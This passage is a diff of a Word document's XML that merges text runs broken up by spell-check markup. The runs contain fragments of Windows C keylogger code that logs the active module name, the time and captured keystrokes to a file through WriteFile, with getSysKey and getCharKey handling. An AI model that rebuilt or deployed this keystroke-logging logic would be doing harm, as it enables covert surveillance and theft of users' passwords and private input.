-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>moduleName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>), &amp;written, NULL);</w:t>
+        <w:t>WriteFile(file, moduleName, strlen(moduleName), &amp;written, NULL);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5724,57 +3907,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>GetLocalTime</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&amp;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>st</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>);</w:t>
+        <w:t>GetLocalTime(&amp;st);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5809,77 +3942,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>GetTimeFormat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>LOCALE_SYSTEM_DEFAULT, 0, &amp;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>st</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, NULL, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>g_buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>, MAX_BUFSIZE);</w:t>
+        <w:t>GetTimeFormat(LOCALE_SYSTEM_DEFAULT, 0, &amp;st, NULL, g_buf, MAX_BUFSIZE);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5914,48 +3977,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>strcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>g_buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>, "</w:t>
+        <w:t>strcat(g_buf, "</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6009,106 +4031,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>char</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> * </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>g_buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> + </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>strlen</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>g_buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>);</w:t>
+        <w:t>char * buf = g_buf + strlen(g_buf);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6143,86 +4066,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>if</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>getSysKey</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>vkCode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>))</w:t>
+        <w:t>if (getSysKey(ks-&gt;vkCode))</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6301,97 +4145,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>WriteFile</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">file, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>g_buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>strlen</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>g_buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>), &amp;written, NULL);</w:t>
+        <w:t>WriteFile(file, g_buf, strlen(g_buf), &amp;written, NULL);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6461,167 +4215,220 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+        <w:t>else if (getCharKey(ks-&gt;vkCode, ks-&gt;scanCode, (LPWORD) buf, winID))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>strcpy(buf + 1, "\r\n");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>WriteFile(file, g_buf, strlen(g_buf), &amp;written, NULL);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
         <w:t>else</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> if (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>getCharKey</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>vkCode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>scanCode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, (LPWORD) </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
